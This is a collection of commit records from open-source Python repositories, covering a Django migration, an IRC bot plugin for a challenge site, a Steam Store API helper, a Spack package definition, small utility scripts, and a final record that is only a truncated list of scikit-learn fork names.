7c6077e107f40a3fcc3e1414f26071ceab0e0cf6 | Create missing migration in taiga.projects.notifications | Rademade/taiga-back,xdevelsistemas/taiga-back-community,dayatz/taiga-back,Rademade/taiga-back,dayatz/taiga-back,Rademade/taiga-back,Rademade/taiga-back,gam-phon/taiga-back,taigaio/taiga-back,taigaio/taiga-back,taigaio/taiga-back,gam-phon/taiga-back,dayatz/taiga-back,xdevelsistemas/taiga-back-community,gam-phon/taiga-back,xdevelsistemas/taiga-back-community,gam-phon/taiga-back,Rademade/taiga-back | taiga/projects/notifications/migrations/0006_auto_20151103_0954.py | taiga/projects/notifications/migrations/0006_auto_20151103_0954.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notifications', '0005_auto_20151005_1357'),
]
operations = [
migrations.AlterField(
model_name='notifypolicy',
name='notify_level',
field=models.SmallIntegerField(choices=[(<NotifyLevel.involved: 1>, 'Involved'), (<NotifyLevel.all: 2>, 'All'), (<NotifyLevel.none: 3>, 'None')]),
),
]
| agpl-3.0 | Python | |
f10209add7513cba71441b410bf3a52a1d1c816c | add new site PyDéfis | tehron/tehbot | tehbot/plugins/challenge/py.py | tehbot/plugins/challenge/py.py | # -*- coding: utf-8 -*-
from tehbot.plugins.challenge import *
import urllib
import urllib2
import urlparse
import lxml.html
import re
class Site(BaseSite):
def prefix(self):
return u"[PyDéfis]"
def siteurl(self):
return "https://pydefis.callicode.fr"
def userstats(self, user):
return self.userstats_api(user)
def userstats_api(self, user):
url = "https://pydefis.callicode.fr/wechall/userscore?username=%s&authkey=%s"
authkey = self.settings["pydefis_api_key"]
html = urllib2.urlopen(url % (Plugin.to_utf8(user), authkey), timeout=5).read()
if html == "0":
return None
user, rank, score, scoremax, challs_solved, challs_total, users_total = html.split(":")
return user, str(int(challs_solved)), int(challs_total), str(int(rank)), int(users_total), int(score), int(scoremax), None
| mit | Python | |
90a22bf70efbc6b14c697305919f6fca3aae39a1 | Create __init__.py | shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE,shnizzedy/SM_openSMILE | __init__.py | __init__.py | apache-2.0 | Python | ||
ad053bd49c0a108ed06df5385a6571b405476bd8 | Create web_browser.py | umangahuja1/Python | web_browser.py | web_browser.py | from webbrowser import *
url="https://www.google.co.in"
open(url)
'''
This script lets you open the given link from terminal directly.
It is made meanwhile learning python.
'''
| apache-2.0 | Python | |
3b29a94a7009c0b652e8eca0b175bb97250e1b33 | Add an extract_features(image, measurements) function returning a feature vector | widoptimization-willett/feature-extraction | feature_extraction/extraction.py | feature_extraction/extraction.py | import numpy as np
"""
Given an image as a Numpy array and a set of measurement objects
implementing a compute method returning a feature vector, return a combined
feature vector.
"""
def extract_features(image, measurements):
# TODO(liam): parallelize multiple measurements on an image by using Celery
return np.ravel([m.compute(image) for m in measurements])
| apache-2.0 | Python | |
1ee6e4f99318a065ee6cceaf2ed470bb3513188e | Add py-hstspreload (#19188) | LLNL/spack,LLNL/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack,LLNL/spack,iulian787/spack,iulian787/spack | var/spack/repos/builtin/packages/py-hstspreload/package.py | var/spack/repos/builtin/packages/py-hstspreload/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyHstspreload(PythonPackage):
"""Chromium HSTS Preload list as a Python package and updated daily"""
homepage = "https://github.com/sethmlarson/hstspreload"
url = "https://pypi.io/packages/source/h/hstspreload/hstspreload-2020.9.23.tar.gz"
version('2020.9.23', sha256='35822733ba67cfb4efc6cd7d1230b509f0bd42c90eeb329faf2fe679f801e40f')
depends_on('py-setuptools', type='build')
depends_on('py-wheel', type='build')
| lgpl-2.1 | Python | |
6533ac770ffd97ece23dcaba154a31297be76b04 | add Steam Store helper | mikoim/japanization,mikoim/japanization | reviews/utils.py | reviews/utils.py | import requests
from django.core.cache import cache
class SteamException(Exception):
pass
class SteamStore(object):
l = None
cc = None
def __init__(self, language='en', country='jp'):
self.l = language
self.cc = country
def appdetails(self, app_id: int) -> dict:
url = 'http://store.steampowered.com/api/appdetails'
cache_key = 'appdetails_{:d}'.format(app_id)
app_id_str = str(app_id)
j = cache.get(cache_key)
if not j:
r = requests.get(url=url, params={'l': self.l, 'cc': self.cc, 'appids': app_id})
if r.status_code != 200:
raise SteamException('Steam API returned non-200 status')
j = r.json()
cache.set(cache_key, j, 1209600)
if app_id_str not in j or not j[app_id_str]['success']:
raise SteamException('Steam API returned unexpected error')
return j[app_id_str]['data']
@staticmethod
def is_support_japanese(data: dict) -> bool:
k = 'supported_languages'
return k in data and 'Japanese' in data[k]
@staticmethod
def name(data: dict) -> str:
return data['name']
| mit | Python | |
d11491d30a2fb418dd40bf7e97d4d35cc84d6f3f | Move Chuck database query function to another file | trojjer/pyjokes,gmarkall/pyjokes,Wren6991/pyjokes,bennuttall/pyjokes,borjaayerdi/pyjokes,ElectronicsGeek/pyjokes,pyjokes/pyjokes,martinohanlon/pyjokes,birdsarah/pyjokes | pyjokes/chuck.py | pyjokes/chuck.py | # -*- coding: utf-8 -*-
import json
try:
from urllib2 import urlopen
except:
from urllib.request import urlopen
def get_chuck_nerd_jokes():
    """Fetch one random nerdy Chuck Norris joke from the ICNDb web API.

    Returns the joke text as a string.  Propagates urllib errors if the
    service is unreachable and ValueError/JSONDecodeError on malformed JSON.
    """
    url = 'http://api.icndb.com/jokes/random?limitTo=[nerdy]'
    # Bug fix: HTTP responses expose read(), not readall() — the original
    # call raised AttributeError on both the py2 and py3 import paths.
    response = urlopen(url).read().decode('utf-8')
    data = json.loads(response)
    return data['value']['joke']
if __name__ == '__main__':
    # Quick smoke test: print one joke when the module is run directly.
    print(get_chuck_nerd_jokes())
| bsd-3-clause | Python | |
46db4860911e687bf5d3beef5f0b2f96ea145cd2 | FIX lasso_dense_vs_sparse_data.py example needed update. | yyjiang/scikit-learn,pratapvardhan/scikit-learn,joshloyal/scikit-learn,procoder317/scikit-learn,kjung/scikit-learn,tosolveit/scikit-learn,anntzer/scikit-learn,stylianos-kampakis/scikit-learn,mugizico/scikit-learn,Barmaley-exe/scikit-learn,thientu/scikit-learn,vigilv/scikit-learn,AlexRobson/scikit-learn,russel1237/scikit-learn,JsNoNo/scikit-learn,bnaul/scikit-learn,aflaxman/scikit-learn,vivekmishra1991/scikit-learn,theoryno3/scikit-learn,jorik041/scikit-learn,mikebenfield/scikit-learn,shenzebang/scikit-learn,lin-credible/scikit-learn,AIML/scikit-learn,mhue/scikit-learn,vivekmishra1991/scikit-learn,fzalkow/scikit-learn,rsivapr/scikit-learn,andaag/scikit-learn,anurag313/scikit-learn,rishikksh20/scikit-learn,MatthieuBizien/scikit-learn,roxyboy/scikit-learn,spallavolu/scikit-learn,anirudhjayaraman/scikit-learn,trungnt13/scikit-learn,sinhrks/scikit-learn,walterreade/scikit-learn,RomainBrault/scikit-learn,alexeyum/scikit-learn,alvarofierroclavero/scikit-learn,Garrett-R/scikit-learn,ogrisel/scikit-learn,bhargav/scikit-learn,ngoix/OCRF,vybstat/scikit-learn,cl4rke/scikit-learn,JsNoNo/scikit-learn,glouppe/scikit-learn,nesterione/scikit-learn,mhdella/scikit-learn,f3r/scikit-learn,JeanKossaifi/scikit-learn,davidgbe/scikit-learn,sgenoud/scikit-learn,mayblue9/scikit-learn,hitszxp/scikit-learn,Djabbz/scikit-learn,betatim/scikit-learn,yonglehou/scikit-learn,bhargav/scikit-learn,liberatorqjw/scikit-learn,fzalkow/scikit-learn,luo66/scikit-learn,rahuldhote/scikit-learn,ZenDevelopmentSystems/scikit-learn,mehdidc/scikit-learn,equialgo/scikit-learn,luo66/scikit-learn,tawsifkhan/scikit-learn,rexshihaoren/scikit-learn,Aasmi/scikit-learn,MechCoder/scikit-learn,mrshu/scikit-learn,chrsrds/scikit-learn,btabibian/scikit-learn,HolgerPeters/scikit-learn,untom/scikit-learn,AlexandreAbraham/scikit-learn,vivekmishra1991/scikit-learn,CVML/scikit-learn,IshankGulati/scikit-learn,belltailjp/scikit-learn,
marcocaccin/scikit-learn,thilbern/scikit-learn,pompiduskus/scikit-learn,pypot/scikit-learn,hitszxp/scikit-learn,MartinDelzant/scikit-learn,ankurankan/scikit-learn,depet/scikit-learn,ivannz/scikit-learn,liangz0707/scikit-learn,quheng/scikit-learn,sgenoud/scikit-learn,RomainBrault/scikit-learn,zorojean/scikit-learn,nikitasingh981/scikit-learn,appapantula/scikit-learn,iismd17/scikit-learn,xubenben/scikit-learn,dsquareindia/scikit-learn,alvarofierroclavero/scikit-learn,dsullivan7/scikit-learn,mehdidc/scikit-learn,yunfeilu/scikit-learn,madjelan/scikit-learn,meduz/scikit-learn,ldirer/scikit-learn,Lawrence-Liu/scikit-learn,thientu/scikit-learn,nikitasingh981/scikit-learn,Nyker510/scikit-learn,mjudsp/Tsallis,heli522/scikit-learn,pratapvardhan/scikit-learn,kevin-intel/scikit-learn,B3AU/waveTree,herilalaina/scikit-learn,TomDLT/scikit-learn,moutai/scikit-learn,dhruv13J/scikit-learn,UNR-AERIAL/scikit-learn,waterponey/scikit-learn,herilalaina/scikit-learn,siutanwong/scikit-learn,murali-munna/scikit-learn,BiaDarkia/scikit-learn,sinhrks/scikit-learn,DonBeo/scikit-learn,fredhusser/scikit-learn,shikhardb/scikit-learn,fredhusser/scikit-learn,yanlend/scikit-learn,fengzhyuan/scikit-learn,ChanChiChoi/scikit-learn,roxyboy/scikit-learn,B3AU/waveTree,ndingwall/scikit-learn,tmhm/scikit-learn,ogrisel/scikit-learn,dingocuster/scikit-learn,aetilley/scikit-learn,ivannz/scikit-learn,iismd17/scikit-learn,pianomania/scikit-learn,phdowling/scikit-learn,zhenv5/scikit-learn,liangz0707/scikit-learn,poryfly/scikit-learn,rajat1994/scikit-learn,ZenDevelopmentSystems/scikit-learn,sarahgrogan/scikit-learn,loli/sklearn-ensembletrees,jakirkham/scikit-learn,HolgerPeters/scikit-learn,kmike/scikit-learn,jakirkham/scikit-learn,zorroblue/scikit-learn,hsiaoyi0504/scikit-learn,sanketloke/scikit-learn,fbagirov/scikit-learn,abhishekkrthakur/scikit-learn,sonnyhu/scikit-learn,bthirion/scikit-learn,dingocuster/scikit-learn,zaxtax/scikit-learn,nesterione/scikit-learn,466152112/scikit-learn,MartinSavc/scikit-learn,Nyker51
0/scikit-learn,tawsifkhan/scikit-learn,smartscheduling/scikit-learn-categorical-tree,altairpearl/scikit-learn,rrohan/scikit-learn,devanshdalal/scikit-learn,deepesch/scikit-learn,heli522/scikit-learn,Windy-Ground/scikit-learn,xwolf12/scikit-learn,fredhusser/scikit-learn,YinongLong/scikit-learn,jkarnows/scikit-learn,khkaminska/scikit-learn,jjx02230808/project0223,frank-tancf/scikit-learn,glemaitre/scikit-learn,0asa/scikit-learn,huobaowangxi/scikit-learn,simon-pepin/scikit-learn,themrmax/scikit-learn,lesteve/scikit-learn,ZENGXH/scikit-learn,pianomania/scikit-learn,fyffyt/scikit-learn,ClimbsRocks/scikit-learn,robbymeals/scikit-learn,trungnt13/scikit-learn,harshaneelhg/scikit-learn,JPFrancoia/scikit-learn,walterreade/scikit-learn,cl4rke/scikit-learn,jzt5132/scikit-learn,jorge2703/scikit-learn,raghavrv/scikit-learn,mwv/scikit-learn,saiwing-yeung/scikit-learn,hsiaoyi0504/scikit-learn,jlegendary/scikit-learn,zorroblue/scikit-learn,samzhang111/scikit-learn,kagayakidan/scikit-learn,shangwuhencc/scikit-learn,bhargav/scikit-learn,glouppe/scikit-learn,466152112/scikit-learn,robin-lai/scikit-learn,ltiao/scikit-learn,giorgiop/scikit-learn,eg-zhang/scikit-learn,mhdella/scikit-learn,sarahgrogan/scikit-learn,yyjiang/scikit-learn,RomainBrault/scikit-learn,ningchi/scikit-learn,jzt5132/scikit-learn,quheng/scikit-learn,jseabold/scikit-learn,zuku1985/scikit-learn,ishanic/scikit-learn,huzq/scikit-learn,mjgrav2001/scikit-learn,xavierwu/scikit-learn,Windy-Ground/scikit-learn,zorojean/scikit-learn,deepesch/scikit-learn,PatrickChrist/scikit-learn,macks22/scikit-learn,pypot/scikit-learn,justincassidy/scikit-learn,devanshdalal/scikit-learn,vshtanko/scikit-learn,belltailjp/scikit-learn,adamgreenhall/scikit-learn,mehdidc/scikit-learn,AlexandreAbraham/scikit-learn,wazeerzulfikar/scikit-learn,zihua/scikit-learn,adamgreenhall/scikit-learn,poryfly/scikit-learn,aetilley/scikit-learn,rexshihaoren/scikit-learn,lazywei/scikit-learn,ChanderG/scikit-learn,djgagne/scikit-learn,chrsrds/scikit-learn,shahankhat
ch/scikit-learn,jmschrei/scikit-learn,0x0all/scikit-learn,MartinDelzant/scikit-learn,f3r/scikit-learn,wlamond/scikit-learn,kagayakidan/scikit-learn,tmhm/scikit-learn,eg-zhang/scikit-learn,spallavolu/scikit-learn,pythonvietnam/scikit-learn,depet/scikit-learn,sanketloke/scikit-learn,fabianp/scikit-learn,Lawrence-Liu/scikit-learn,abimannans/scikit-learn,petosegan/scikit-learn,trankmichael/scikit-learn,qifeigit/scikit-learn,terkkila/scikit-learn,vigilv/scikit-learn,eg-zhang/scikit-learn,heli522/scikit-learn,jlegendary/scikit-learn,voxlol/scikit-learn,h2educ/scikit-learn,vshtanko/scikit-learn,ishanic/scikit-learn,pnedunuri/scikit-learn,mxjl620/scikit-learn,DonBeo/scikit-learn,rrohan/scikit-learn,icdishb/scikit-learn,cwu2011/scikit-learn,ycaihua/scikit-learn,ashhher3/scikit-learn,depet/scikit-learn,krez13/scikit-learn,JosmanPS/scikit-learn,mrshu/scikit-learn,Djabbz/scikit-learn,phdowling/scikit-learn,LiaoPan/scikit-learn,plissonf/scikit-learn,jereze/scikit-learn,mjudsp/Tsallis,larsmans/scikit-learn,mattilyra/scikit-learn,schets/scikit-learn,harshaneelhg/scikit-learn,Clyde-fare/scikit-learn,JosmanPS/scikit-learn,madjelan/scikit-learn,mfjb/scikit-learn,huobaowangxi/scikit-learn,Myasuka/scikit-learn,arabenjamin/scikit-learn,vibhorag/scikit-learn,samuel1208/scikit-learn,ky822/scikit-learn,abhishekgahlot/scikit-learn,f3r/scikit-learn,nomadcube/scikit-learn,NelisVerhoef/scikit-learn,dingocuster/scikit-learn,CforED/Machine-Learning,jzt5132/scikit-learn,AlexRobson/scikit-learn,RayMick/scikit-learn,ElDeveloper/scikit-learn,aminert/scikit-learn,maheshakya/scikit-learn,ZENGXH/scikit-learn,hdmetor/scikit-learn,PatrickOReilly/scikit-learn,murali-munna/scikit-learn,ngoix/OCRF,ivannz/scikit-learn,pianomania/scikit-learn,mojoboss/scikit-learn,3manuek/scikit-learn,tmhm/scikit-learn,hugobowne/scikit-learn,justincassidy/scikit-learn,lucidfrontier45/scikit-learn,pkruskal/scikit-learn,nikitasingh981/scikit-learn,PrashntS/scikit-learn,ilo10/scikit-learn,yask123/scikit-learn,thilbern/scikit-lea
rn,abhishekgahlot/scikit-learn,dsullivan7/scikit-learn,PatrickChrist/scikit-learn,rohanp/scikit-learn,wazeerzulfikar/scikit-learn,themrmax/scikit-learn,rohanp/scikit-learn,kmike/scikit-learn,Windy-Ground/scikit-learn,fzalkow/scikit-learn,jmetzen/scikit-learn,equialgo/scikit-learn,ClimbsRocks/scikit-learn,mhdella/scikit-learn,MechCoder/scikit-learn,evgchz/scikit-learn,mjgrav2001/scikit-learn,costypetrisor/scikit-learn,harshaneelhg/scikit-learn,espg/scikit-learn,mayblue9/scikit-learn,vermouthmjl/scikit-learn,vortex-ape/scikit-learn,OshynSong/scikit-learn,yask123/scikit-learn,mayblue9/scikit-learn,Myasuka/scikit-learn,trungnt13/scikit-learn,yyjiang/scikit-learn,wlamond/scikit-learn,herilalaina/scikit-learn,r-mart/scikit-learn,lenovor/scikit-learn,imaculate/scikit-learn,icdishb/scikit-learn,rahul-c1/scikit-learn,tawsifkhan/scikit-learn,PatrickChrist/scikit-learn,altairpearl/scikit-learn,shyamalschandra/scikit-learn,AIML/scikit-learn,smartscheduling/scikit-learn-categorical-tree,ahoyosid/scikit-learn,nrhine1/scikit-learn,JPFrancoia/scikit-learn,voxlol/scikit-learn,jorik041/scikit-learn,icdishb/scikit-learn,devanshdalal/scikit-learn,h2educ/scikit-learn,MohammedWasim/scikit-learn,carrillo/scikit-learn,sgenoud/scikit-learn,jjx02230808/project0223,pv/scikit-learn,PrashntS/scikit-learn,xavierwu/scikit-learn,ElDeveloper/scikit-learn,HolgerPeters/scikit-learn,henridwyer/scikit-learn,Vimos/scikit-learn,AlexanderFabisch/scikit-learn,nomadcube/scikit-learn,idlead/scikit-learn,billy-inn/scikit-learn,clemkoa/scikit-learn,olologin/scikit-learn,ilyes14/scikit-learn,rvraghav93/scikit-learn,cainiaocome/scikit-learn,olologin/scikit-learn,hrjn/scikit-learn,toastedcornflakes/scikit-learn,roxyboy/scikit-learn,tomlof/scikit-learn,joshloyal/scikit-learn,arjoly/scikit-learn,xzh86/scikit-learn,toastedcornflakes/scikit-learn,jseabold/scikit-learn,mlyundin/scikit-learn,xiaoxiamii/scikit-learn,petosegan/scikit-learn,arahuja/scikit-learn,pnedunuri/scikit-learn,fabioticconi/scikit-learn,waterponey/s
cikit-learn,jm-begon/scikit-learn,MatthieuBizien/scikit-learn,robbymeals/scikit-learn,Jimmy-Morzaria/scikit-learn,lucidfrontier45/scikit-learn,Adai0808/scikit-learn,plissonf/scikit-learn,sonnyhu/scikit-learn,plissonf/scikit-learn,potash/scikit-learn,rsivapr/scikit-learn,imaculate/scikit-learn,thientu/scikit-learn,tomlof/scikit-learn,MatthieuBizien/scikit-learn,arahuja/scikit-learn,ndingwall/scikit-learn,devanshdalal/scikit-learn,ndingwall/scikit-learn,xwolf12/scikit-learn,RayMick/scikit-learn,mblondel/scikit-learn,gotomypc/scikit-learn,ephes/scikit-learn,krez13/scikit-learn,espg/scikit-learn,victorbergelin/scikit-learn,belltailjp/scikit-learn,Adai0808/scikit-learn,abhishekkrthakur/scikit-learn,joernhees/scikit-learn,pnedunuri/scikit-learn,pythonvietnam/scikit-learn,phdowling/scikit-learn,cdegroc/scikit-learn,djgagne/scikit-learn,JsNoNo/scikit-learn,IshankGulati/scikit-learn,nelson-liu/scikit-learn,victorbergelin/scikit-learn,LohithBlaze/scikit-learn,RayMick/scikit-learn,Titan-C/scikit-learn,jakobworldpeace/scikit-learn,waterponey/scikit-learn,yonglehou/scikit-learn,adamgreenhall/scikit-learn,btabibian/scikit-learn,eickenberg/scikit-learn,vigilv/scikit-learn,Garrett-R/scikit-learn,krez13/scikit-learn,q1ang/scikit-learn,gclenaghan/scikit-learn,ashhher3/scikit-learn,andrewnc/scikit-learn,xubenben/scikit-learn,lucidfrontier45/scikit-learn,liyu1990/sklearn,ky822/scikit-learn,simon-pepin/scikit-learn,ZENGXH/scikit-learn,akionakamura/scikit-learn,TomDLT/scikit-learn,idlead/scikit-learn,hugobowne/scikit-learn,xuewei4d/scikit-learn,etkirsch/scikit-learn,qifeigit/scikit-learn,ZenDevelopmentSystems/scikit-learn,jaidevd/scikit-learn,mattilyra/scikit-learn,glemaitre/scikit-learn,liyu1990/sklearn,evgchz/scikit-learn,scikit-learn/scikit-learn,aetilley/scikit-learn,pompiduskus/scikit-learn,scikit-learn/scikit-learn,manhhomienbienthuy/scikit-learn,PatrickOReilly/scikit-learn,cauchycui/scikit-learn,sgenoud/scikit-learn,fengzhyuan/scikit-learn,kashif/scikit-learn,andrewnc/scikit-learn
,florian-f/sklearn,rahuldhote/scikit-learn,schets/scikit-learn,huzq/scikit-learn,terkkila/scikit-learn,DSLituiev/scikit-learn,iismd17/scikit-learn,rishikksh20/scikit-learn,manhhomienbienthuy/scikit-learn,Aasmi/scikit-learn,zorroblue/scikit-learn,wazeerzulfikar/scikit-learn,ChanChiChoi/scikit-learn,davidgbe/scikit-learn,wazeerzulfikar/scikit-learn,rsivapr/scikit-learn,ycaihua/scikit-learn,bnaul/scikit-learn,bikong2/scikit-learn,ssaeger/scikit-learn,ssaeger/scikit-learn,arabenjamin/scikit-learn,Vimos/scikit-learn,maheshakya/scikit-learn,tdhopper/scikit-learn,frank-tancf/scikit-learn,bthirion/scikit-learn,carrillo/scikit-learn,Aasmi/scikit-learn,samzhang111/scikit-learn,meduz/scikit-learn,theoryno3/scikit-learn,rohanp/scikit-learn,Jimmy-Morzaria/scikit-learn,petosegan/scikit-learn,saiwing-yeung/scikit-learn,vortex-ape/scikit-learn,cauchycui/scikit-learn,trankmichael/scikit-learn,amueller/scikit-learn,mwv/scikit-learn,kylerbrown/scikit-learn,potash/scikit-learn,Srisai85/scikit-learn,toastedcornflakes/scikit-learn,carrillo/scikit-learn,ishanic/scikit-learn,MartinSavc/scikit-learn,Fireblend/scikit-learn,billy-inn/scikit-learn,altairpearl/scikit-learn,AnasGhrab/scikit-learn,nmayorov/scikit-learn,manhhomienbienthuy/scikit-learn,Sentient07/scikit-learn,mblondel/scikit-learn,RachitKansal/scikit-learn,fengzhyuan/scikit-learn,jpautom/scikit-learn,fredhusser/scikit-learn,jakobworldpeace/scikit-learn,jblackburne/scikit-learn,mlyundin/scikit-learn,ycaihua/scikit-learn,sinhrks/scikit-learn,sinhrks/scikit-learn,akionakamura/scikit-learn,jpautom/scikit-learn,xubenben/scikit-learn,OshynSong/scikit-learn,xuewei4d/scikit-learn,russel1237/scikit-learn,ldirer/scikit-learn,q1ang/scikit-learn,glouppe/scikit-learn,manashmndl/scikit-learn,OshynSong/scikit-learn,equialgo/scikit-learn,vshtanko/scikit-learn,pv/scikit-learn,giorgiop/scikit-learn,Nyker510/scikit-learn,aewhatley/scikit-learn,Garrett-R/scikit-learn,mblondel/scikit-learn,rsivapr/scikit-learn,raghavrv/scikit-learn,marcocaccin/scikit-l
earn,liyu1990/sklearn,Achuth17/scikit-learn,vortex-ape/scikit-learn,hsuantien/scikit-learn,frank-tancf/scikit-learn,cybernet14/scikit-learn,IssamLaradji/scikit-learn,q1ang/scikit-learn,iismd17/scikit-learn,0x0all/scikit-learn,CforED/Machine-Learning,ahoyosid/scikit-learn,wzbozon/scikit-learn,shusenl/scikit-learn,pnedunuri/scikit-learn,saiwing-yeung/scikit-learn,MartinDelzant/scikit-learn,IssamLaradji/scikit-learn,jorge2703/scikit-learn,betatim/scikit-learn,djgagne/scikit-learn,nesterione/scikit-learn,anirudhjayaraman/scikit-learn,xwolf12/scikit-learn,scikit-learn/scikit-learn,vivekmishra1991/scikit-learn,aminert/scikit-learn,ishanic/scikit-learn,imaculate/scikit-learn,macks22/scikit-learn,nhejazi/scikit-learn,btabibian/scikit-learn,nikitasingh981/scikit-learn,mjgrav2001/scikit-learn,siutanwong/scikit-learn,vybstat/scikit-learn,clemkoa/scikit-learn,akionakamura/scikit-learn,tdhopper/scikit-learn,PatrickOReilly/scikit-learn,ilo10/scikit-learn,lin-credible/scikit-learn,wanggang3333/scikit-learn,lbishal/scikit-learn,hsuantien/scikit-learn,Akshay0724/scikit-learn,mfjb/scikit-learn,ankurankan/scikit-learn,olologin/scikit-learn,wzbozon/scikit-learn,RomainBrault/scikit-learn,MechCoder/scikit-learn,0asa/scikit-learn,jorik041/scikit-learn,michigraber/scikit-learn,thientu/scikit-learn,xavierwu/scikit-learn,xuewei4d/scikit-learn,MohammedWasim/scikit-learn,f3r/scikit-learn,yunfeilu/scikit-learn,hrjn/scikit-learn,anurag313/scikit-learn,yask123/scikit-learn,lenovor/scikit-learn,AlexanderFabisch/scikit-learn,toastedcornflakes/scikit-learn,arabenjamin/scikit-learn,bnaul/scikit-learn,yanlend/scikit-learn,dsquareindia/scikit-learn,nvoron23/scikit-learn,clemkoa/scikit-learn,CVML/scikit-learn,RPGOne/scikit-learn,bigdataelephants/scikit-learn,hugobowne/scikit-learn,zuku1985/scikit-learn,nhejazi/scikit-learn,mikebenfield/scikit-learn,vermouthmjl/scikit-learn,YinongLong/scikit-learn,hitszxp/scikit-learn,abhishekkrthakur/scikit-learn,etkirsch/scikit-learn,liberatorqjw/scikit-learn,q1ang/sci
kit-learn,lbishal/scikit-learn,466152112/scikit-learn,huzq/scikit-learn,RPGOne/scikit-learn,jmetzen/scikit-learn,0x0all/scikit-learn,fabioticconi/scikit-learn,wlamond/scikit-learn,stylianos-kampakis/scikit-learn,ChanderG/scikit-learn,kjung/scikit-learn,nvoron23/scikit-learn,mojoboss/scikit-learn,khkaminska/scikit-learn,JPFrancoia/scikit-learn,ndingwall/scikit-learn,voxlol/scikit-learn,rishikksh20/scikit-learn,davidgbe/scikit-learn,JosmanPS/scikit-learn,JosmanPS/scikit-learn,tosolveit/scikit-learn,alexsavio/scikit-learn,Sentient07/scikit-learn,kevin-intel/scikit-learn,zihua/scikit-learn,B3AU/waveTree,potash/scikit-learn,PrashntS/scikit-learn,DSLituiev/scikit-learn,larsmans/scikit-learn,vybstat/scikit-learn,r-mart/scikit-learn,joshloyal/scikit-learn,mattgiguere/scikit-learn,ycaihua/scikit-learn,ogrisel/scikit-learn,robbymeals/scikit-learn,plissonf/scikit-learn,Jimmy-Morzaria/scikit-learn,kevin-intel/scikit-learn,cybernet14/scikit-learn,hlin117/scikit-learn,macks22/scikit-learn,zorojean/scikit-learn,smartscheduling/scikit-learn-categorical-tree,YinongLong/scikit-learn,Djabbz/scikit-learn,lbishal/scikit-learn,MartinSavc/scikit-learn,yyjiang/scikit-learn,akionakamura/scikit-learn,abimannans/scikit-learn,LohithBlaze/scikit-learn,zuku1985/scikit-learn,shikhardb/scikit-learn,vinayak-mehta/scikit-learn,Titan-C/scikit-learn,nesterione/scikit-learn,untom/scikit-learn,AlexandreAbraham/scikit-learn,shusenl/scikit-learn,bikong2/scikit-learn,AIML/scikit-learn,mugizico/scikit-learn,mwv/scikit-learn,tosolveit/scikit-learn,joernhees/scikit-learn,eickenberg/scikit-learn,cwu2011/scikit-learn,lenovor/scikit-learn,CVML/scikit-learn,ningchi/scikit-learn,hainm/scikit-learn,lazywei/scikit-learn,glennq/scikit-learn,JeanKossaifi/scikit-learn,dsquareindia/scikit-learn,xyguo/scikit-learn,Achuth17/scikit-learn,sanketloke/scikit-learn,mattgiguere/scikit-learn,DSLituiev/scikit-learn,elkingtonmcb/scikit-learn,vinayak-mehta/scikit-learn,Myasuka/scikit-learn,NunoEdgarGub1/scikit-learn,ilo10/scikit-le
arn,ivannz/scikit-learn,rrohan/scikit-learn,procoder317/scikit-learn,loli/semisupervisedforests,tmhm/scikit-learn,nmayorov/scikit-learn,xubenben/scikit-learn,CforED/Machine-Learning,luo66/scikit-learn,nvoron23/scikit-learn,AlexRobson/scikit-learn,loli/sklearn-ensembletrees,RPGOne/scikit-learn,khkaminska/scikit-learn,alexsavio/scikit-learn,potash/scikit-learn,wzbozon/scikit-learn,ZenDevelopmentSystems/scikit-learn,Lawrence-Liu/scikit-learn,zhenv5/scikit-learn,xuewei4d/scikit-learn,aewhatley/scikit-learn,pypot/scikit-learn,macks22/scikit-learn,anurag313/scikit-learn,Obus/scikit-learn,cdegroc/scikit-learn,fabianp/scikit-learn,alexeyum/scikit-learn,vybstat/scikit-learn,jayflo/scikit-learn,simon-pepin/scikit-learn,jlegendary/scikit-learn,murali-munna/scikit-learn,Jimmy-Morzaria/scikit-learn,mjudsp/Tsallis,treycausey/scikit-learn,simon-pepin/scikit-learn,henrykironde/scikit-learn,maheshakya/scikit-learn,saiwing-yeung/scikit-learn,glennq/scikit-learn,spallavolu/scikit-learn,vshtanko/scikit-learn,shyamalschandra/scikit-learn,robin-lai/scikit-learn,rrohan/scikit-learn,bigdataelephants/scikit-learn,jakobworldpeace/scikit-learn,TomDLT/scikit-learn,elkingtonmcb/scikit-learn,Sentient07/scikit-learn,IshankGulati/scikit-learn,kagayakidan/scikit-learn,chrisburr/scikit-learn,jayflo/scikit-learn,rvraghav93/scikit-learn,ngoix/OCRF,bthirion/scikit-learn,jpautom/scikit-learn,BiaDarkia/scikit-learn,treycausey/scikit-learn,ElDeveloper/scikit-learn,andrewnc/scikit-learn,cdegroc/scikit-learn,deepesch/scikit-learn,kjung/scikit-learn,nmayorov/scikit-learn,arjoly/scikit-learn,466152112/scikit-learn,Achuth17/scikit-learn,LiaoPan/scikit-learn,mayblue9/scikit-learn,wzbozon/scikit-learn,betatim/scikit-learn,Srisai85/scikit-learn,belltailjp/scikit-learn,elkingtonmcb/scikit-learn,tomlof/scikit-learn,0x0all/scikit-learn,rvraghav93/scikit-learn,rajat1994/scikit-learn,icdishb/scikit-learn,ClimbsRocks/scikit-learn,NelisVerhoef/scikit-learn,walterreade/scikit-learn,andaag/scikit-learn,yanlend/scikit-lear
